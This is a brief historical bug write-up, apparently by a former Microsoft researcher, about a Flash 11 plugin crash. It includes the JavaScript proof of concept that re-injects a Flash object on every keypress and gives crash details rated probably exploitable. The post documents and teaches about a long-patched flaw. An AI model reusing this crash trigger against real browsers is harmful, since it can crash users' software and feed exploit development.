I found that repeatedly reloading a Flash object via innerHTML in a tight onkeypress loop caused a crash in Flash11f rated PROBABLY_EXPLOITABLE. Each keypress replaced the DOM with a new Flash object parameterized with a random query string, and the rapid churn of object creation and destruction triggered a null-pointer DEP violation inside the Flash plugin.
var code = 'document.body.innerHTML =\'<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="100" height="100"><param name="movie" value="call.swf?RND=\'+Math.random()+\'" /></object>\';';
document.onkeypress = function(){eval(code)};Holding down any key caused the browser to rapidly re-inject the Flash object with a fresh random parameter each time. The fault landed at address 0x00000000 — a DEP violation at the null address — called from Flash11f+0xdbc75, rated PROBABLY_EXPLOITABLE as a near-null software NX fault.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.